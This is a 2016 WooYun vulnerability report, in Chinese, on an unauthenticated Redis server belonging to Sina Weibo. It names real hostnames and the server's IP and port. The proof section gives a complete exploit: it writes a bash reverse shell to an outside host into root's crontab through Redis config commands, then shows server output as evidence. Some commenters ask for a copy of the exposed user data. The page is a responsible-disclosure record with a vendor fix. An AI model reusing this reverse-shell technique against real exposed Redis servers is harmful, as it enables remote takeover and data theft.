当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195480

漏洞标题:新浪微博某服务器控制不当(可远程SHELL)

相关厂商:新浪微博

漏洞作者: 猪猪侠

提交时间:2016-04-12 16:06

修复时间:2016-05-28 11:10

公开时间:2016-05-28 11:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 细节向公众公开

简要描述:

新浪微博某服务器直接弹个SHELL这样,SQL注入就先不发了
看到某个/opt/dbbackup目录里面有个weibo_user, weibo_data的msyql数据库目录,惊呆了

详细说明:

#1 漏洞服务器
zhaopin.weibo.cn
zhaopin.weibo.com
renmai.weibo.com
redis: 59.151.119.139
port: 7377
#2 info
redis-cli -h 59.151.119.139 -p 7377 > info

redis 59.151.119.139:7377> info
# Server
redis_version:2.6.16
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Linux 2.6.32-358.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:4043
run_id:0f89bdc9a6b581d090794c2958a66378f908ac7c
tcp_port:7377
uptime_in_seconds:3870141
uptime_in_days:44
hz:10
lru_clock:1341304
# Clients
connected_clients:94
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:2912472
used_memory_human:2.78M
used_memory_rss:47570944
used_memory_peak:12092599096

漏洞证明:

#3 exp get shell

redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save


/sbin/ifconfig
em1 Link encap:Ethernet HWaddr B8:CA:3A:66:23:8C
inet addr:59.151.119.139 Bcast:59.151.119.143 Mask:255.255.255.240
inet6 addr: fe80::baca:3aff:fe66:238c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39369206 errors:0 dropped:0 overruns:0 frame:0
TX packets:25652875 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3482359996 (3.2 GiB) TX bytes:3912378525 (3.6 GiB)
Memory:dcb00000-dcc00000
em2 Link encap:Ethernet HWaddr B8:CA:3A:66:23:8D
inet addr:192.168.119.139 Bcast:192.168.119.255 Mask:255.255.255.0
inet6 addr: fe80::baca:3aff:fe66:238d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1470362969 errors:0 dropped:0 overruns:0 frame:0
TX packets:773443973 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:125737431825 (117.1 GiB) TX bytes:83544898974 (77.8 GiB)
Memory:dcc00000-dcd00000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:482626975 errors:0 dropped:0 overruns:0 frame:0
TX packets:482626975 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:42841400037 (39.8 GiB) TX bytes:42841400037 (39.8 GiB)


#4 证明

db1.jpg


db2.jpg

修复方案:

# 加入访问控制

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-13 11:03

厂商回复:

感谢关注新浪安全,将通知合作方修复此问题。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-12 16:07 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    1

  2. 2016-04-12 16:09 | YY-2012 ( 核心白帽子 | Rank:3814 漏洞数:726 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    2

  3. 2016-04-12 16:10 | IOT ( 实习白帽子 | Rank:99 漏洞数:24 | 不知道什么时候才有很多人知道我呢)

    2

  4. 2016-04-12 16:10 | IOT ( 实习白帽子 | Rank:99 漏洞数:24 | 不知道什么时候才有很多人知道我呢)

    @YY-2012 。。比我快1秒

  5. 2016-04-12 16:10 | sqlfeng ( 普通白帽子 | Rank:623 漏洞数:78 | 慢慢来,不急)

    2

  6. 2016-04-12 16:11 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    给利用方式抖个激灵

  7. 2016-04-12 16:11 | 白泽 ( 普通白帽子 | Rank:205 漏洞数:19 | 放假中。。。)

    给利用方式抖个激灵

  8. 2016-04-12 16:11 | YY-2012 ( 核心白帽子 | Rank:3814 漏洞数:726 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @sqlfeng @IOT 你们同时的。。

  9. 2016-04-12 16:12 | L3m0n ( 路人 | Rank:5 漏洞数:2 | xx)

    前排!!!

  10. 2016-04-12 16:13 | px1624 ( 普通白帽子 | Rank:1137 漏洞数:198 | px1624)

    最近各种大招啊!

  11. 2016-04-12 16:22 | j0k3r ( 普通白帽子 | Rank:759 漏洞数:192 | 心有猛虎,细嗅蔷薇)

    惊呆了

  12. 2016-04-12 16:41 | j14n ( 普通白帽子 | Rank:1824 漏洞数:321 | ... . -.-. - . .- --)

    @IOT 1分钟吧。

  13. 2016-04-12 16:56 | w3924686 ( 路人 | Rank:1 漏洞数:1 | 路人)

    user亮了

  14. 2016-04-12 18:09 | Hackshy ( 实习白帽子 | Rank:73 漏洞数:30 | XXXXXXXXXXXX)

    ........猪猪侠的大招吗

  15. 2016-04-12 19:21 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    原来可以这样利用!

  16. 2016-04-12 19:41 | autO_pw ( 实习白帽子 | Rank:75 漏洞数:22 | o_O``)

    前排,请务必给我一份

  17. 2016-04-12 20:06 | 刀仔 ( 路人 | Rank:2 漏洞数:1 | 大家好)

    @j14n 大侠能单独联系下吗

  18. 2016-04-12 21:19 | T-rex丶Jim ( 普通白帽子 | Rank:140 漏洞数:37 )

    前排留名

  19. 2016-04-12 21:52 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)

    前排,请务必给我一份

  20. 2016-04-12 22:02 | 3xpl0it ( 普通白帽子 | Rank:151 漏洞数:37 )

    待猪哥替我研究研究裤子是否合身

  21. 2016-04-12 23:22 | superbing ( 普通白帽子 | Rank:210 漏洞数:33 | 常羡古时儿女怀,嘻戏千山好自在。)

    weibo_data?什么意思哈?看不懂~~~嘿嘿

  22. 2016-04-12 23:45 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    猪哥威武